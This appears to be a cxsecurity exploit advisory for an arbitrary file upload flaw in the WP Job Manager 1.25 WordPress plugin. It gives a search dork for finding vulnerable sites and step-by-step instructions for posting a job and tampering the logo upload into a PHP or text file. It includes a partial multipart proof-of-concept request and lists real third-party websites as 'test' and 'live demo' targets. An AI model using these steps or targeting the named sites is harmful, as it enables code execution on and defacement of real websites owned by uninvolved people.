Wordpress WP Job Manager 1.25 Arbitrary File Upload Vulnerability

2016.07.12
Credit: xBADGIRL21
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: inurl:/wp-content/uploads/job-manager-uploads

###################### # Exploit Title : Wordpress WP Job Manager 1.25 Arbitrary File Upload Vulnerability # Exploit Author : xBADGIRL21 # Dork : inurl:/wp-content/uploads/job-manager-uploads # Software link : http://downloads.wordpress.org/plugin/wp-job-manager.latest-stable.zip # Vendor Homepage : https://wpjobmanager.com/ # version : 1.25.0 # Tested on: [ Windows ] # skype:xbadgirl21 # Date: 2016/07/11 # video Proof : https://youtu.be/nx-WtfdOkLc ###################### # [+] DESCRIPTION : ###################### # [+] WP Job Manager is a lightweight plugin for adding job-board functionality to your WordPress site. # [+] An arbitrary file upload web vulnerability has been detected in the WP Job Manager 1.25 and below. # [+] The vulnerability allows remote attackers to upload arbitrary files within the wordpress upload directory ###################### # [+] USAGE : ###################### # 1.- SELECT A WEBSITE FROM THE DORK ABOVE # 2.- GO TO POST A JOB URL <HOST><WP-PATH>/post-a-job/ [or] Look for it # 3.- Fill all the Fields No need to Register or Preview Then in Logo upload your FILE.jpg # 4.- Using Tamper Data or HTTP LIVE Headers change your FILE.TXT OR PHP # 5.- Go to url "http(s)://<wp-host>/<wp-path>/wp-content/uploads/job-manager-uploads/company_logo/<Year/month>/<your-file-name>" ###################### # [+] Poc : ###################### # -----------------------------18132430516394rn # Content-Disposition: form-data; name="script"rn # rn # truern # -----------------------------18132430516394rn # Content-Disposition: form-data; name="company_logo"; filename="x.txt"rn # Content-Type: image/jpegrn # rn ###################### # [+] Test : ###################### # http://sala.sk.ca/wp-content/uploads/job-manager-uploads/company_logo//2016//07/xx.txt # http://www.ruralhumanservices.org/wp-content/uploads/job-manager-uploads/company_logo/2016//07/xx.txt ###################### # [+] File Path : ###################### # http(s)://<wp-host>/<wp-path>/wp-content/uploads/job-manager-uploads/company_logo/2016//07/x.txt ###################### # [+] Live Demo : ###################### # http://www.ruralhumanservices.org/post-a-job/ # http://sala.sk.ca/post-a-job/ # http://www.elmundodeltransporte.com/publica-una-oferta-laboral # ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere #######################

References:

https://youtu.be/nx-WtfdOkLc


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top